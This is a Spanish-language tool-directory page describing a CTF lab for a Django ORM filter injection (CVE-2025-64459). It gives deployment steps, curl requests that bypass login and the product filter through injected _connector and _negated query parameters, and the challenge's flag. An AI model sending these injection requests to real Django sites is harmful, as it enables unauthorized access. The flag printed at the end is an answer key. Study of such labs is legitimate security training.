Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-64459 — CTF challenge que demuestra la inyección en filtros del ORM de Django (CVE-2025-64459) con exploits de bypass de autenticación y bypass de filtros de productos, incluyendo el despliegue y la recuperación de la flag. | Kitploit
Herramientas/GitHubGitHub/z3yr0xx/cve-2025-64459
Análisis de VulnerabilidadesExplotación de Aplicaciones WebSeguridad WebCTFAprendizaje y EducaciónLabs y Práctica
GitHubz3yr0xx/cve-2025-64459

CVE-2025-64459

CTF challenge que demuestra la inyección en filtros del ORM de Django (CVE-2025-64459) con exploits de bypass de autenticación y bypass de filtros de productos, incluyendo el despliegue y la recuperación de la flag.

Ver Repositorio
2hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Desafío CTF: Inyección en el ORM de Django (CVE-2025-64459)

Categoría: Seguridad Web
Dificultad: Media
Vulnerabilidad: CVE-2025-64459 - Inyección en el filtro ORM de Django

📝 Descripción

Construimos una tienda de merchandising segura con panel de administración. ¿Puedes evadir la autenticación y encontrar la nota privada del administrador?

URL: http://YOUR_SERVER:6008

🚀 Despliegue

root@kitploit:~
cd web_django_cve
docker-compose up --build -d

🎯 Exploits (CVE-2025-64459)

Bypass de autenticación (/login/)

root@kitploit:~
# Usando _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"

# Usando _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"

Bypass del filtro de productos (/)

root@kitploit:~
# Negar el filtro is_public
curl "http://HOST:8054/?_negated=True"

# Acceso directo
curl "http://HOST:8054/?is_public=False"

🏁 Bandera

lol-you-here_then-you_exploited_me

Descargar herramienta